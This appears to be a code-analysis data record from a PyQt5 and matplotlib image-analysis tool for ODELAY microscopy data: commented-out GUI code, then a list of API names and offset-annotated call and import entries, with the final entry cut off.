# hbox.addWidget(w)
# hbox.setAlignment(w, Qt.AlignVCenter)
# vbox = QVBoxLayout()
# vbox.addWidget(self.canvas)
# vbox.addWidget(self.mpl_toolbar)
# vbox.addLayout(hbox)
# self.main_frame.setLayout(vbox)
# self.setCentralWidget(self.main_frame)
# def create_status_bar(self):
# self.status_text = QLabel("This is a demo")
# self.statusBar().addWidget(self.status_text, 1)
# def create_menu(self):
# self.file_menu = self.menuBar().addMenu("&File")
# load_file_action = self.create_action("&Save plot",
# shortcut="Ctrl+S", slot=self.save_plot,
# tip="Save the plot")
# quit_action = self.create_action("&Quit", slot=self.close,
# shortcut="Ctrl+Q", tip="Close the application")
# self.add_actions(self.file_menu,
# (load_file_action, None, quit_action))
# self.help_menu = self.menuBar().addMenu("&Help")
# about_action = self.create_action("&About",
# shortcut='F1', slot=self.on_about,
# tip='About the demo')
# self.add_actions(self.help_menu, (about_action,))
# def add_actions(self, target, actions):
# for action in actions:
# if action is None:
# target.addSeparator()
# else:
# target.addAction(action)
# def create_action( self, text, slot=None, shortcut=None,
# icon=None, tip=None, checkable=False):
# action = QAction(text, self)
# if icon is not None:
# action.setIcon(QIcon(":/%s.png" % icon))
# if shortcut is not None:
# action.setShortcut(shortcut)
# if tip is not None:
# action.setToolTip(tip)
# action.setStatusTip(tip)
# if slot is not None:
# action.triggered.connect(slot)
# if checkable:
# action.setCheckable(True)
# return action
# # def main():
# # app = QApplication(sys.argv)
# # form = AppForm()
# # form.show()
# # app.exec_()
# # if __name__ == "__main__":
# # main()
# class InteractiveGCPlot(QWidget)
|
[
"PyQt5.QtCore.pyqtSignal",
"numpy.sum",
"numpy.abs",
"numpy.argmax",
"matplotlib.pyplot.axes",
"numpy.empty",
"PyQt5.QtWidgets.QPushButton",
"PyQt5.QtGui.QColor",
"numpy.iinfo",
"numpy.clip",
"PyQt5.QtWidgets.QFileDialog.getOpenFileName",
"PyQt5.QtWidgets.QVBoxLayout",
"matplotlib.pyplot.figure",
"pathlib.Path",
"numpy.arange",
"PyQt5.QtCore.QRectF",
"PyQt5.QtWidgets.QSlider",
"PyQt5.QtWidgets.QApplication",
"PyQt5.QtWidgets.QGraphicsScene",
"cv2.imshow",
"numpy.round",
"PyQt5.QtWidgets.QLabel",
"PyQt5.QtGui.QPixmap.fromImage",
"PyQt5.QtWidgets.QWidget",
"PyQt5.QtWidgets.QToolButton",
"matplotlib.pyplot.close",
"numpy.require",
"numpy.cumsum",
"PyQt5.QtWidgets.QFileDialog.Options",
"numpy.max",
"tools.imagepl.assembleImage",
"numpy.linspace",
"PyQt5.QtWidgets.QGraphicsPixmapItem",
"matplotlib.patches.PathPatch",
"PyQt5.QtWidgets.QComboBox",
"matplotlib.pyplot.show",
"cv2.waitKey",
"numpy.log2",
"PyQt5.QtWidgets.QHBoxLayout",
"fast_histogram.histogram1d",
"PyQt5.QtGui.QImage",
"tools.imagepl.stitchImage",
"tools.fileio.loadConfig",
"PyQt5.QtGui.QPixmap",
"PyQt5.QtGui.QIcon",
"PyQt5.QtWidgets.QLineEdit",
"numpy.zeros",
"tools.fileio.loadData",
"matplotlib.path.Path",
"PyQt5.QtCore.QUrl.fromLocalFile",
"numpy.diff",
"numpy.array",
"cv2.destroyWindow",
"matplotlib.pyplot.savefig"
] |
[((1200, 1216), 'matplotlib.pyplot.close', 'plt.close', (['"""all"""'], {}), "('all')\n", (1209, 1216), True, 'import matplotlib.pyplot as plt\n'), ((2367, 2474), 'numpy.array', 'np.array', (['[[0, 0, 0, 0.3], [0, 0, 1, 1], [0, 0.7, 0, 1], [1, 0, 0, 1], [0.7, 0.5, 0, 1]]'], {'dtype': '"""float"""'}), "([[0, 0, 0, 0.3], [0, 0, 1, 1], [0, 0.7, 0, 1], [1, 0, 0, 1], [0.7,\n 0.5, 0, 1]], dtype='float')\n", (2375, 2474), True, 'import numpy as np\n'), ((2614, 2686), 'numpy.array', 'np.array', (['[rngTime, rngTdbl, rngTlag, rngTexp, rngNDub]'], {'dtype': '"""float64"""'}), "([rngTime, rngTdbl, rngTlag, rngTexp, rngNDub], dtype='float64')\n", (2622, 2686), True, 'import numpy as np\n'), ((2857, 2896), 'numpy.zeros', 'np.zeros', (['(5, numbins)'], {'dtype': '"""float64"""'}), "((5, numbins), dtype='float64')\n", (2865, 2896), True, 'import numpy as np\n'), ((2913, 2952), 'numpy.zeros', 'np.zeros', (['(5, numbins)'], {'dtype': '"""float64"""'}), "((5, numbins), dtype='float64')\n", (2921, 2952), True, 'import numpy as np\n'), ((2969, 3008), 'numpy.zeros', 'np.zeros', (['(5, numbins)'], {'dtype': '"""float64"""'}), "((5, numbins), dtype='float64')\n", (2977, 3008), True, 'import numpy as np\n'), ((3306, 3508), 'numpy.array', 'np.array', (['[[0.1875, 0.66666667, 0.75, 0.28], [0.1875, 0.48666667, 0.75, 0.1], [0.1875,\n 0.33333333, 0.75, 0.1], [0.1875, 0.19333333, 0.75, 0.1], [0.1875, \n 0.05333333, 0.75, 0.1]]'], {'dtype': '"""float64"""'}), "([[0.1875, 0.66666667, 0.75, 0.28], [0.1875, 0.48666667, 0.75, 0.1],\n [0.1875, 0.33333333, 0.75, 0.1], [0.1875, 0.19333333, 0.75, 0.1], [\n 0.1875, 0.05333333, 0.75, 0.1]], dtype='float64')\n", (3314, 3508), True, 'import numpy as np\n'), ((3616, 3688), 'numpy.array', 'np.array', (['[rngTime, rngTdbl, rngTlag, rngTexp, rngNDub]'], {'dtype': '"""float64"""'}), "([rngTime, rngTdbl, rngTlag, rngTexp, rngNDub], dtype='float64')\n", (3624, 3688), True, 'import numpy as np\n'), ((3789, 3857), 'numpy.array', 'np.array', (['[rngArea, [0, 1], [0, 1], [0, 1], [0, 1]]'], {'dtype': '"""float64"""'}), "([rngArea, [0, 1], [0, 1], [0, 1], [0, 1]], dtype='float64')\n", (3797, 3857), True, 'import numpy as np\n'), ((4417, 4469), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '[4, 7.5]', 'dpi': '(100)', 'facecolor': '"""w"""'}), "(figsize=[4, 7.5], dpi=100, facecolor='w')\n", (4427, 4469), True, 'import matplotlib.pyplot as plt\n'), ((5375, 5391), 'matplotlib.pyplot.close', 'plt.close', (['"""all"""'], {}), "('all')\n", (5384, 5391), True, 'import matplotlib.pyplot as plt\n'), ((6331, 6405), 'numpy.array', 'np.array', (['[rngTdbl, rngTlag, rngTexp, rngNDub, rngPopNum]'], {'dtype': '"""float64"""'}), "([rngTdbl, rngTlag, rngTexp, rngNDub, rngPopNum], dtype='float64')\n", (6339, 6405), True, 'import numpy as np\n'), ((7626, 7664), 'numpy.zeros', 'np.zeros', (['(numRoi + 1, 2)'], {'dtype': '"""int"""'}), "((numRoi + 1, 2), dtype='int')\n", (7634, 7664), True, 'import numpy as np\n'), ((8643, 8674), 'numpy.zeros', 'np.zeros', (['(5, 4)'], {'dtype': '"""float"""'}), "((5, 4), dtype='float')\n", (8651, 8674), True, 'import numpy as np\n'), ((8784, 8834), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '[7, 9]', 'dpi': '(100)', 'facecolor': '"""w"""'}), "(figsize=[7, 9], dpi=100, facecolor='w')\n", (8794, 8834), True, 'import matplotlib.pyplot as plt\n'), ((10231, 10257), 'numpy.arange', 'np.arange', (['poptot.shape[0]'], {}), '(poptot.shape[0])\n', (10240, 10257), True, 'import numpy as np\n'), ((10272, 10315), 'numpy.zeros', 'np.zeros', (['(poptot.shape[0],)'], 
{'dtype': '"""float"""'}), "((poptot.shape[0],), dtype='float')\n", (10280, 10315), True, 'import numpy as np\n'), ((10764, 10774), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (10772, 10774), True, 'import matplotlib.pyplot as plt\n'), ((10861, 10883), 'pathlib.Path', 'pathlib.Path', (['imageDir'], {}), '(imageDir)\n', (10873, 10883), False, 'import pathlib\n'), ((11071, 11098), 'pathlib.Path', 'pathlib.Path', (["('./' + roiLbl)"], {}), "('./' + roiLbl)\n", (11083, 11098), False, 'import pathlib\n'), ((11119, 11178), 'pathlib.Path', 'pathlib.Path', (["('./' + roiLbl + '_' + f'{imNum:00d}' + '.mat')"], {}), "('./' + roiLbl + '_' + f'{imNum:00d}' + '.mat')\n", (11131, 11178), False, 'import pathlib\n'), ((11364, 11385), 'pathlib.Path', 'pathlib.Path', (['dataDir'], {}), '(dataDir)\n', (11376, 11385), False, 'import pathlib\n'), ((11464, 11489), 'tools.fileio.loadData', 'fio.loadData', (['initPath[0]'], {}), '(initPath[0])\n', (11476, 11489), True, 'import tools.fileio as fio\n'), ((11640, 11706), 'tools.imagepl.stitchImage', 'opl.stitchImage', (['imageFilePath', 'pixSize', 'magnification', 'background'], {}), '(imageFilePath, pixSize, magnification, background)\n', (11655, 11706), True, 'import tools.imagepl as opl\n'), ((12029, 12049), 'numpy.cumsum', 'np.cumsum', (['imageHist'], {}), '(imageHist)\n', (12038, 12049), True, 'import numpy as np\n'), ((12205, 12231), 'numpy.argmax', 'np.argmax', (['(cumProb > 1e-05)'], {}), '(cumProb > 1e-05)\n', (12214, 12231), True, 'import numpy as np\n'), ((12245, 12273), 'numpy.argmax', 'np.argmax', (['(cumProb >= 0.9995)'], {}), '(cumProb >= 0.9995)\n', (12254, 12273), True, 'import numpy as np\n'), ((12492, 12525), 'cv2.imshow', 'cv2.imshow', (['"""Display Image"""', 'rsIm'], {}), "('Display Image', rsIm)\n", (12502, 12525), False, 'import cv2\n'), ((12535, 12549), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (12546, 12549), False, 'import cv2\n'), ((12794, 12816), 'pathlib.Path', 'pathlib.Path', (['imageDir'], {}), '(imageDir)\n', (12806, 12816), False, 'import pathlib\n'), ((12939, 12966), 'pathlib.Path', 'pathlib.Path', (["('./' + roiLbl)"], {}), "('./' + roiLbl)\n", (12951, 12966), False, 'import pathlib\n'), ((12987, 13046), 'pathlib.Path', 'pathlib.Path', (["('./' + roiLbl + '_' + f'{imNum:00d}' + '.mat')"], {}), "('./' + roiLbl + '_' + f'{imNum:00d}' + '.mat')\n", (12999, 13046), False, 'import pathlib\n'), ((13232, 13253), 'pathlib.Path', 'pathlib.Path', (['dataDir'], {}), '(dataDir)\n', (13244, 13253), False, 'import pathlib\n'), ((13332, 13357), 'tools.fileio.loadData', 'fio.loadData', (['initPath[0]'], {}), '(initPath[0])\n', (13344, 13357), True, 'import tools.fileio as fio\n'), ((13438, 13459), 'tools.fileio.loadData', 'fio.loadData', (['roiPath'], {}), '(roiPath)\n', (13450, 13459), True, 'import tools.fileio as fio\n'), ((13804, 13891), 'tools.imagepl.assembleImage', 'opl.assembleImage', (['imageFilePath', 'pixSize', 'magnification', 'background', 'stitchCorners'], {}), '(imageFilePath, pixSize, magnification, background,\n stitchCorners)\n', (13821, 13891), True, 'import tools.imagepl as opl\n'), ((14230, 14250), 'numpy.cumsum', 'np.cumsum', (['imageHist'], {}), '(imageHist)\n', (14239, 14250), True, 'import numpy as np\n'), ((14406, 14432), 'numpy.argmax', 'np.argmax', (['(cumProb > 1e-05)'], {}), '(cumProb > 1e-05)\n', (14415, 14432), True, 'import numpy as np\n'), ((14446, 14474), 'numpy.argmax', 'np.argmax', (['(cumProb >= 0.9995)'], {}), '(cumProb >= 0.9995)\n', (14455, 14474), True, 'import numpy as np\n'), 
((14693, 14726), 'cv2.imshow', 'cv2.imshow', (['"""Display Image"""', 'rsIm'], {}), "('Display Image', rsIm)\n", (14703, 14726), False, 'import cv2\n'), ((14736, 14750), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (14747, 14750), False, 'import cv2\n'), ((15316, 15337), 'numpy.arange', 'np.arange', (['(0)', '(100)', '(20)'], {}), '(0, 100, 20)\n', (15325, 15337), True, 'import numpy as np\n'), ((17824, 17844), 'numpy.arange', 'np.arange', (['(0)', '(70)', '(10)'], {}), '(0, 70, 10)\n', (17833, 17844), True, 'import numpy as np\n'), ((23048, 23088), 'numpy.empty', 'np.empty', (['imageHist.shape'], {'dtype': '"""float"""'}), "(imageHist.shape, dtype='float')\n", (23056, 23088), True, 'import numpy as np\n'), ((23129, 23153), 'numpy.cumsum', 'np.cumsum', (['imageHist[1:]'], {}), '(imageHist[1:])\n', (23138, 23153), True, 'import numpy as np\n'), ((23406, 23434), 'numpy.argmax', 'np.argmax', (['(cumHist >= lowcut)'], {}), '(cumHist >= lowcut)\n', (23415, 23434), True, 'import numpy as np\n'), ((23446, 23475), 'numpy.argmax', 'np.argmax', (['(cumHist >= highcut)'], {}), '(cumHist >= highcut)\n', (23455, 23475), True, 'import numpy as np\n'), ((23720, 23769), 'numpy.require', 'np.require', (['scIm'], {'dtype': '"""uint8"""', 'requirements': '"""C"""'}), "(scIm, dtype='uint8', requirements='C')\n", (23730, 23769), True, 'import numpy as np\n'), ((24215, 24254), 'numpy.zeros', 'np.zeros', (['(rc[0] + 3, 2)'], {'dtype': '"""float"""'}), "((rc[0] + 3, 2), dtype='float')\n", (24223, 24254), True, 'import numpy as np\n'), ((24733, 24765), 'PyQt5.QtCore.pyqtSignal', 'QtCore.pyqtSignal', (['QtCore.QPoint'], {}), '(QtCore.QPoint)\n', (24750, 24765), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((40266, 40288), 'PyQt5.QtWidgets.QApplication', 'QApplication', (['sys.argv'], {}), '(sys.argv)\n', (40278, 40288), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QSizePolicy, QWidget, QInputDialog, QFileDialog\n'), ((40431, 40463), 'PyQt5.QtWidgets.QApplication', 'QtWidgets.QApplication', (['sys.argv'], {}), '(sys.argv)\n', (40453, 40463), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1864, 1892), 'numpy.sum', 'np.sum', (['(rawobjectArea > 0)', '(1)'], {}), '(rawobjectArea > 0, 1)\n', (1870, 1892), True, 'import numpy as np\n'), ((3058, 3110), 'numpy.linspace', 'np.linspace', (['xLim[cnt, 0]', 'xLim[cnt, 1]'], {'num': 'numbins'}), '(xLim[cnt, 0], xLim[cnt, 1], num=numbins)\n', (3069, 3110), True, 'import numpy as np\n'), ((3133, 3201), 'fast_histogram.histogram1d', 'histogram1d', (['fitData[:, fitCol[cnt]]', '(75)', 'xLim[cnt, :]'], {'weights': 'None'}), '(fitData[:, fitCol[cnt]], 75, xLim[cnt, :], weights=None)\n', (3144, 3201), False, 'from fast_histogram import histogram1d\n'), ((4510, 4567), 'matplotlib.pyplot.axes', 'plt.axes', (['axesPos[n, :]'], {'xlim': 'xLim[n, :]', 'ylim': 'yLim[n, :]'}), '(axesPos[n, :], xlim=xLim[n, :], ylim=yLim[n, :])\n', (4518, 4567), True, 'import matplotlib.pyplot as plt\n'), ((4595, 4614), 'numpy.log2', 'np.log2', (['objectArea'], {}), '(objectArea)\n', (4602, 4614), True, 'import numpy as np\n'), ((5249, 5270), 'matplotlib.pyplot.savefig', 'plt.savefig', (['savePath'], {}), '(savePath)\n', (5260, 5270), True, 'import matplotlib.pyplot as plt\n'), ((5291, 5301), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5299, 5301), True, 'import matplotlib.pyplot as plt\n'), ((7775, 7814), 'numpy.zeros', 'np.zeros', (['(5, numbins)'], {'dtype': '"""float64"""'}), "((5, numbins), dtype='float64')\n", (7783, 7814), True, 
'import numpy as np\n'), ((7835, 7874), 'numpy.zeros', 'np.zeros', (['(5, numbins)'], {'dtype': '"""float64"""'}), "((5, numbins), dtype='float64')\n", (7843, 7874), True, 'import numpy as np\n'), ((7895, 7934), 'numpy.zeros', 'np.zeros', (['(5, numbins)'], {'dtype': '"""float64"""'}), "((5, numbins), dtype='float64')\n", (7903, 7934), True, 'import numpy as np\n'), ((9364, 9467), 'matplotlib.patches.PathPatch', 'mpatches.PathPatch', (['pathDict[roi][textLbls[n]]'], {'facecolor': '[0, 0, 1, 1]', 'edgecolor': 'None', 'linewidth': '(0)'}), '(pathDict[roi][textLbls[n]], facecolor=[0, 0, 1, 1],\n edgecolor=None, linewidth=0)\n', (9382, 9467), True, 'import matplotlib.patches as mpatches\n'), ((10338, 10444), 'matplotlib.pyplot.axes', 'plt.axes', (['axesPos[n, :]'], {'xscale': '"""log"""', 'xlim': '[1, 10000]', 'ylim': '[0, numRoi + 1]', 'yticks': '[]', 'xticks': 'xTicks'}), "(axesPos[n, :], xscale='log', xlim=[1, 10000], ylim=[0, numRoi + 1],\n yticks=[], xticks=xTicks)\n", (10346, 10444), True, 'import matplotlib.pyplot as plt\n'), ((12590, 12624), 'cv2.destroyWindow', 'cv2.destroyWindow', (['"""Display Image"""'], {}), "('Display Image')\n", (12607, 12624), False, 'import cv2\n'), ((14791, 14825), 'cv2.destroyWindow', 'cv2.destroyWindow', (['"""Display Image"""'], {}), "('Display Image')\n", (14808, 14825), False, 'import cv2\n'), ((24926, 24956), 'PyQt5.QtWidgets.QGraphicsScene', 'QtWidgets.QGraphicsScene', (['self'], {}), '(self)\n', (24950, 24956), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((24980, 25011), 'PyQt5.QtWidgets.QGraphicsPixmapItem', 'QtWidgets.QGraphicsPixmapItem', ([], {}), '()\n', (25009, 25011), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((25035, 25043), 'PyQt5.QtGui.QImage', 'QImage', ([], {}), '()\n', (25041, 25043), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((28043, 28059), 'tools.fileio.loadConfig', 'fio.loadConfig', ([], {}), '()\n', (28057, 28059), True, 'import tools.fileio as fio\n'), ((28456, 28481), 'PyQt5.QtWidgets.QComboBox', 'QtWidgets.QComboBox', (['self'], {}), '(self)\n', (28475, 28481), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((28725, 28752), 'PyQt5.QtWidgets.QToolButton', 'QtWidgets.QToolButton', (['self'], {}), '(self)\n', (28746, 28752), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((28986, 29013), 'PyQt5.QtWidgets.QToolButton', 'QtWidgets.QToolButton', (['self'], {}), '(self)\n', (29007, 29013), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((29247, 29274), 'PyQt5.QtWidgets.QToolButton', 'QtWidgets.QToolButton', (['self'], {}), '(self)\n', (29268, 29274), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((29527, 29554), 'PyQt5.QtWidgets.QToolButton', 'QtWidgets.QToolButton', (['self'], {}), '(self)\n', (29548, 29554), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((29698, 29723), 'PyQt5.QtWidgets.QLineEdit', 'QtWidgets.QLineEdit', (['self'], {}), '(self)\n', (29717, 29723), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((29900, 29922), 'PyQt5.QtWidgets.QSlider', 'QSlider', (['Qt.Horizontal'], {}), '(Qt.Horizontal)\n', (29907, 29922), False, 'from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction\n'), ((30098, 30125), 'PyQt5.QtWidgets.QVBoxLayout', 'QtWidgets.QVBoxLayout', (['self'], {}), '(self)\n', (30119, 30125), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((30235, 30258), 'PyQt5.QtWidgets.QHBoxLayout', 'QtWidgets.QHBoxLayout', ([], {}), '()\n', (30256, 30258), 
False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((31046, 31083), 'PyQt5.QtGui.QPixmap.fromImage', 'QPixmap.fromImage', (['self.viewer.qImage'], {}), '(self.viewer.qImage)\n', (31063, 31083), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((31223, 31244), 'PyQt5.QtWidgets.QFileDialog.Options', 'QFileDialog.Options', ([], {}), '()\n', (31242, 31244), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QSizePolicy, QWidget, QInputDialog, QFileDialog\n'), ((33089, 33110), 'PyQt5.QtWidgets.QFileDialog.Options', 'QFileDialog.Options', ([], {}), '()\n', (33108, 33110), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QSizePolicy, QWidget, QInputDialog, QFileDialog\n'), ((33134, 33284), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['None', '"""Select ODELAY Data Set"""', '""""""', '"""ODELAYExpDisc (*Index_ODELAYData.mat);; Mat-Files (*.mat)"""'], {'options': 'options'}), "(None, 'Select ODELAY Data Set', '',\n 'ODELAYExpDisc (*Index_ODELAYData.mat);; Mat-Files (*.mat)', options=\n options)\n", (33161, 33284), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QSizePolicy, QWidget, QInputDialog, QFileDialog\n'), ((33359, 33407), 'pathlib.Path', 'pathlib.Path', (["self.odelayConfig['LocalImageDir']"], {}), "(self.odelayConfig['LocalImageDir'])\n", (33371, 33407), False, 'import pathlib\n'), ((33429, 33476), 'pathlib.Path', 'pathlib.Path', (["self.odelayConfig['LocalDataDir']"], {}), "(self.odelayConfig['LocalDataDir'])\n", (33441, 33476), False, 'import pathlib\n'), ((33863, 33911), 'pathlib.Path', 'pathlib.Path', (["self.odelayConfig['LocalImageDir']"], {}), "(self.odelayConfig['LocalImageDir'])\n", (33875, 33911), False, 'import pathlib\n'), ((33933, 33980), 'pathlib.Path', 'pathlib.Path', (["self.odelayConfig['LocalDataDir']"], {}), "(self.odelayConfig['LocalDataDir'])\n", (33945, 33980), False, 'import pathlib\n'), ((34105, 34132), 'pathlib.Path', 'pathlib.Path', (["('./' + roiLbl)"], {}), "('./' + roiLbl)\n", (34117, 34132), False, 'import pathlib\n'), ((34157, 34216), 'pathlib.Path', 'pathlib.Path', (["('./' + roiLbl + '_' + f'{imNum:00d}' + '.mat')"], {}), "('./' + roiLbl + '_' + f'{imNum:00d}' + '.mat')\n", (34169, 34216), False, 'import pathlib\n'), ((34491, 34512), 'tools.fileio.loadData', 'fio.loadData', (['roiPath'], {}), '(roiPath)\n', (34503, 34512), True, 'import tools.fileio as fio\n'), ((34909, 34996), 'tools.imagepl.assembleImage', 'opl.assembleImage', (['imageFilePath', 'pixSize', 'magnification', 'background', 'stitchCorners'], {}), '(imageFilePath, pixSize, magnification, background,\n stitchCorners)\n', (34926, 34996), True, 'import tools.imagepl as opl\n'), ((35291, 35331), 'numpy.zeros', 'np.zeros', (['imageHist.shape'], {'dtype': '"""float"""'}), "(imageHist.shape, dtype='float')\n", (35299, 35331), True, 'import numpy as np\n'), ((35355, 35379), 'numpy.cumsum', 'np.cumsum', (['imageHist[1:]'], {}), '(imageHist[1:])\n', (35364, 35379), True, 'import numpy as np\n'), ((35581, 35609), 'numpy.argmax', 'np.argmax', (['(cumProb >= lowcut)'], {}), '(cumProb >= lowcut)\n', (35590, 35609), True, 'import numpy as np\n'), ((35625, 35654), 'numpy.argmax', 'np.argmax', (['(cumProb >= highcut)'], {}), '(cumProb >= highcut)\n', (35634, 35654), True, 'import numpy as np\n'), ((35783, 35800), 'numpy.iinfo', 'np.iinfo', (['"""uint8"""'], {}), "('uint8')\n", (35791, 35800), True, 'import numpy as np\n'), ((35817, 35848), 'numpy.clip', 'np.clip', (['scIm', 'lim.min', 'lim.max'], 
{}), '(scIm, lim.min, lim.max)\n', (35824, 35848), True, 'import numpy as np\n'), ((35952, 36001), 'numpy.require', 'np.require', (['scIm'], {'dtype': '"""uint8"""', 'requirements': '"""C"""'}), "(scIm, dtype='uint8', requirements='C')\n", (35962, 36001), True, 'import numpy as np\n'), ((36084, 36197), 'PyQt5.QtGui.QImage', 'QImage', (['imageData.data', 'imageData.shape[1]', 'imageData.shape[0]', 'imageData.shape[1]', 'QImage.Format_Grayscale8'], {}), '(imageData.data, imageData.shape[1], imageData.shape[0], imageData.\n shape[1], QImage.Format_Grayscale8)\n', (36090, 36197), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((36644, 36657), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ([], {}), '()\n', (36655, 36657), False, 'from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction\n'), ((36867, 36889), 'PyQt5.QtWidgets.QSlider', 'QSlider', (['Qt.Horizontal'], {}), '(Qt.Horizontal)\n', (36874, 36889), False, 'from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction\n'), ((37033, 37041), 'PyQt5.QtWidgets.QLabel', 'QLabel', ([], {}), '()\n', (37039, 37041), False, 'from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction\n'), ((37946, 37959), 'PyQt5.QtWidgets.QWidget', 'QWidget', (['self'], {}), '(self)\n', (37953, 37959), False, 'from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction\n'), ((38072, 38085), 'PyQt5.QtWidgets.QHBoxLayout', 'QHBoxLayout', ([], {}), '()\n', (38083, 38085), False, 'from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction\n'), ((38264, 38277), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (38275, 38277), False, 'from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction\n'), ((38865, 38881), 'tools.fileio.loadConfig', 'fio.loadConfig', ([], {}), '()\n', (38879, 38881), True, 'import tools.fileio as fio\n'), ((38905, 38982), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""Open Movie"""', "odelayConfig['LocalDataDir']"], {}), "(self, 'Open Movie', odelayConfig['LocalDataDir'])\n", (38932, 38982), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QSizePolicy, QWidget, QInputDialog, QFileDialog\n'), ((40827, 40859), 'numpy.abs', 'np.abs', (['((wl - 440) / (440 - 380))'], {}), '((wl - 440) / (440 - 380))\n', (40833, 40859), True, 'import numpy as np\n'), ((4932, 4989), 'matplotlib.pyplot.axes', 'plt.axes', (['axesPos[n, :]'], {'xlim': 'xLim[n, :]', 'ylim': 'yLim[n, :]'}), '(axesPos[n, :], xlim=xLim[n, :], ylim=yLim[n, :])\n', (4940, 4989), True, 'import matplotlib.pyplot as plt\n'), ((8103, 8151), 'numpy.linspace', 'np.linspace', (['xLim[n, 0]', 'xLim[n, 1]'], {'num': 'numbins'}), '(xLim[n, 0], xLim[n, 1], num=numbins)\n', (8114, 8151), True, 'import numpy as np\n'), ((8176, 8262), 'fast_histogram.histogram1d', 'histogram1d', (['(fitData[:, fitCol[n]] / devisor[n])', 'numbins', 'xLim[n, :]'], {'weights': 'None'}), '(fitData[:, fitCol[n]] / devisor[n], numbins, xLim[n, :],\n weights=None)\n', (8187, 8262), False, 'from fast_histogram import histogram1d\n'), ((8456, 8480), 'matplotlib.path.Path', 'mpath.Path', (['verts', 'codes'], {}), '(verts, codes)\n', (8466, 8480), True, 'import 
matplotlib.path as mpath\n'), ((9658, 9750), 'matplotlib.pyplot.axes', 'plt.axes', (['axesPos[n, :]'], {'xlim': 'xLim[n, :]', 'ylim': '[0, numRoi + 1]', 'yticks': '[]', 'xticks': 'xTicks'}), '(axesPos[n, :], xlim=xLim[n, :], ylim=[0, numRoi + 1], yticks=[],\n xticks=xTicks)\n', (9666, 9750), True, 'import matplotlib.pyplot as plt\n'), ((9962, 10065), 'matplotlib.patches.PathPatch', 'mpatches.PathPatch', (['pathDict[roi][textLbls[n]]'], {'facecolor': '[0, 0, 1, 1]', 'edgecolor': 'None', 'linewidth': '(0)'}), '(pathDict[roi][textLbls[n]], facecolor=[0, 0, 1, 1],\n edgecolor=None, linewidth=0)\n', (9980, 10065), True, 'import matplotlib.patches as mpatches\n'), ((23486, 23511), 'numpy.clip', 'np.clip', (['im', 'loval', 'hival'], {}), '(im, loval, hival)\n', (23493, 23511), True, 'import numpy as np\n'), ((33656, 33682), 'tools.fileio.loadData', 'fio.loadData', (['expIndexPath'], {}), '(expIndexPath)\n', (33668, 33682), True, 'import tools.fileio as fio\n'), ((37203, 37220), 'PyQt5.QtGui.QIcon', 'QIcon', (['"""open.png"""'], {}), "('open.png')\n", (37208, 37220), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((37449, 37466), 'PyQt5.QtGui.QIcon', 'QIcon', (['"""exit.png"""'], {}), "('exit.png')\n", (37454, 37466), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((40944, 40976), 'numpy.abs', 'np.abs', (['((wl - 440) / (490 - 440))'], {}), '((wl - 440) / (490 - 440))\n', (40950, 40976), True, 'import numpy as np\n'), ((41584, 41607), 'numpy.round', 'np.round', (['(SSS * R * 255)'], {}), '(SSS * R * 255)\n', (41592, 41607), True, 'import numpy as np\n'), ((41629, 41652), 'numpy.round', 'np.round', (['(SSS * G * 255)'], {}), '(SSS * G * 255)\n', (41637, 41652), True, 'import numpy as np\n'), ((41674, 41697), 'numpy.round', 'np.round', (['(SSS * B * 255)'], {}), '(SSS * B * 255)\n', (41682, 41697), True, 'import numpy as np\n'), ((3245, 3270), 'numpy.max', 'np.max', (['virts[cnt, 2:-10]'], {}), '(virts[cnt, 2:-10])\n', (3251, 3270), True, 'import numpy as np\n'), ((25468, 25492), 'PyQt5.QtGui.QColor', 'QtGui.QColor', 